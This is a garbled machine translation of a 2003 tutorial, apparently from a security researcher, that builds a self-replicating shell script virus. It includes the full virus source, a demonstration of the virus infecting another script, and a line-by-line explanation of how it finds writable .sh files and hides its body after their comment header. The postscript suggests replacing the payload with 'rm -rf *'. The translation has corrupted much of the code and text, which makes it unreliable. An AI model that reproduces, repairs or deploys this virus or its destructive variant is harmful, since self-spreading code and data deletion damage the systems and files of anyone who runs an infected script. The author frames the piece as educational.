Introduction to Shell Virus
1 Introduction
Speaking of the virus always a little mysterious taste, thinking about the first DOS virus before using the compilation, it is so painful
From the beginning of the assumption to finish spend more than 3 months, and writing is also messy, and recently, the early admiration is not a sense.
Dyed other documents, spread themselves, write a virus with shell and not very simple, so he wrote
Such a small script, the function is to infect other shell programs.
This procedure is not very good in reality, but for the understanding of the understanding of the viral communication mechanism is very helpful, you can
Calculating the meaning of teaching is greater than the practical meaning.
2. Program code
#! / bin / sh
# File name: virus_demo.sh
# Used: SHELL virus presentation.
# Description: The virus will infect all the files ending in the current directory, but will not repeat infection.
# 编写: Watercloud@xfocus.org
# Date: 2003-5-13
#B: < ! A% C & T:>
vfile = $ _; vtmp = / tmp / .vtmp. $$
For f in ./.sh; do
IF [! -w $ f -a! -r $ vfile]; THEN CONTINUE; FI
IF grep '< ! a% C & T:>' $ f; Then Continue; Fi
IF SED-N '1P' $ F | GREP 'CSH'; THEN CONTINUE; FI
CP -F $ F $ VTMP; IF [$? -ne 0]; the continue; fi
VNO = `awk '$ 0 ~ / (^ / b * #) | (^ / b * $) / && v == NR-1 {V } end {print 0 v}' $ VTMP`
Sed -n "1, $ {vno} p" $ VTMP> $ f
(SED-N '/ ^ # B: < ! a% C & T:> /, / ^ # E: < ! a% C & T:> / P' $ VFILE; ECHO >> $ f
VNO = `EXPR $ VNO 1`
Sed -n "$ {vno}, / $ p" $ VTMP >> $ f
RM -F $ VTMP
DONE> / dev / null 2> & 1
Unset vtmp; unset vfile; unset vno
Echo "Hi, Here Is A Demo Shell Virus in your script!"
#E: < ! A% C & T:>
#Eof
How strong shell is so powerful, so short programs can infect other program files.
3. Demonstration
have a test:
First put two files in the current directory, a virus file, one for use to be infected.
[Cloud @ / export / home / cloud / vir]> ls -l
DRWXR-XR-X 2 Cloud Staff 512 6 ?? 4 17:43 ./
DRWXR-XR-X 10 Cloud Staff 1024 6 ?? 4 17:41 ../
-RWXR - R - 1 Cloud Staff 89 6 ?? 4 17:43 Test.sh
-RWXR - R - 1 Cloud Staff 773 6 ?? 4 17:42 Virus_Demo.sh
Let's take a look at our "broiler" script, very simple:
[Cloud @ / EXPORT / HOME / Cloud / Vir]> Cat Test.sh #! / bin / sh
# Just A Demo for Virus Test
# Author: foo
# Date: 3000-1-1
LS -L
#Eof
I started to infect him.
[cloud @ / export / home / cloud / vir]> ./virus_demo.sh
Hi, Here Is A Demo Shell Virus in your script!
Let's see the result of infection:
[Cloud @ / EXPORT / HOME / Cloud / Vir]> Cat Test.sh
#! / bin / sh
# Just A Demo for Virus Test
# Author: foo
# Date: 3000-1-1
#B: < ! A% C & T:>
vfile = $ _; vtmp = / tmp / .vtmp. $$
For f in ./.sh; do
IF [! -w $ f -a! -r $ vfile]; THEN CONTINUE; FI
IF grep '< ! a% C & T:>' $ f; Then Continue; Fi
IF SED-N '1P' $ F | GREP 'CSH'; THEN CONTINUE; FI
CP -F $ F $ VTMP; IF [$? -ne 0]; the continue; fi
VNO = `awk '$ 0 ~ / (^ / b * #) | (^ / b * $) / && v == NR-1 {V } end {print 0 v}' $ VTMP`
Sed -n "1, $ {vno} p" $ VTMP> $ f
(SED-N '/ ^ # B: < ! a% C & T:> /, / ^ # E: < ! a% C & T:> / P' $ VFILE; ECHO >> $ f
VNO = `EXPR $ VNO 1`
Sed -n "$ {vno}, / $ p" $ VTMP >> $ f
RM -F $ VTMP
DONE> / dev / null 2> & 1
Unset vtmp; unset vfile; unset vno
Echo "Hi, Here Is A Demo Shell Virus in your script!"
#E: < ! A% C & T:>
LS -L
#Eof
Look, virus body:
#B: < ! A% C & T:>
.
#E: < ! A% C & T:>
Copying is over, so the virus is spread.
It is worth noting that the location of the virus insertion is the beginning of the effective procedure of the source test.sh!
This mainly considers that the general shell program, everyone likes to note in the program,
You can't put someone else's comment information to the back, it is too obvious.
Let's take a look at our new virus body to see:
[Cloud @ / export / home / cloud / vir]> ./test.sh
Hi, Here Is A Demo Shell Virus in your script! <- Look, print information inside the virus body.
-RWXR-XR-X 1 Cloud Staff 724 6 ?? 4 17:44 Test.sh
-RWXR-XR-X 1 Cloud Staff 773 6 ?? 4 17:42 virus_demo.sh4. Simple explanation
Let's analyze this virus step by step:
#B: < ! A% C & T:>
The viral body starts tag, used for program copying yourself
vfile = $ _; vtmp = / tmp / .vtmp. $$
Define two variables, a temporary file, a record current program name $ _, this also requires us
This line must be an effective line as a program, and if we put it, we can't get the current program.
Name, you can't find where to find a virus to copy it.
For f in ./.sh; do
Start loop, find all the programs at the end of the current directory.
IF [! -w $ f -a! -r $ vfile]; THEN CONTINUE; FI
Whether the target is written, whether the viral source file has read permissions.
IF grep '< ! a% C & T:>' $ f; Then Continue; Fi
Whether the goal is poisoned is very deeper, it can be saved. If you still give him another time, it is too bad.
IF SED-N '1P' $ F | GREP 'CSH'; THEN CONTINUE; FI
If the target shell is too big in the syntax of CSH, give up.
CP -F $ F $ VTMP; IF [$? -ne 0]; the continue; fi
It's ready to infection, first copy a backup of the goal, what should I do if the copy fails? Of course, I have to give up.
VNO = `awk '$ 0 ~ / (^ / b * #) | (^ / b * $) / && v == NR-1 {V } end {print 0 v}' $ VTMP`
What is this? It seems quite complex, but learning shell virus does not understand awk and formal expressions seem to say no.
In the past, this is the annotation and blank line of finding the program. It is easy to determine the virus body.
Insertion point.
Sed -n "1, $ {vno} p" $ VTMP> $ f
A sed command comes back from the backup file from the backup file from the backup file.
(SED-N '/ ^ # B: < ! a% C & T:> /, / ^ # E: < ! a% C & T:> / P' $ VFILE; ECHO >> $ f
Another SED is another work of the handling viral body.
VNO = `EXPR $ VNO 1`
Sed -n "$ {vno}, / $ p" $ VTMP >> $ f
The last sed moved back to the other parts of the target file, and SED is really powerful! !
RM -F $ VTMP
Clean up temporary files
DONE> / dev / null 2> & 1
Cycle end
Unset vtmp; unset vfile; unset vno
Clean up the crime scene.
Echo "Hi, Here Is A Demo Shell Virus in your script!"
I have been infected and also to show some things to tell others that this is a program that is infected by a virus.
#E: < ! A% C & T:>
The virus body ends marks, used for program copying themselves
5. Postscript
From this, we can see that the script virus is very simple, there is no need to write one, and the virus
The destructive power is also unbearable. For example, the Echo information is changed to rm -rf *;
It also shows the power of the shell, trying to spend how much effort to deal with the PE file structure and the ELF structure.
The above program has been tested on Linux and Solaris, and Windows is available on Cygwin.
It should also be possible.
By the way, it emphasizes once. Writing this article is to share with you to understand the virus, not
Teach the virus out of harm, remember to remember!
#Eof
#Game over
Echo "Hook Axiang!"
Watercloud@xfocus.org
2003-6-4
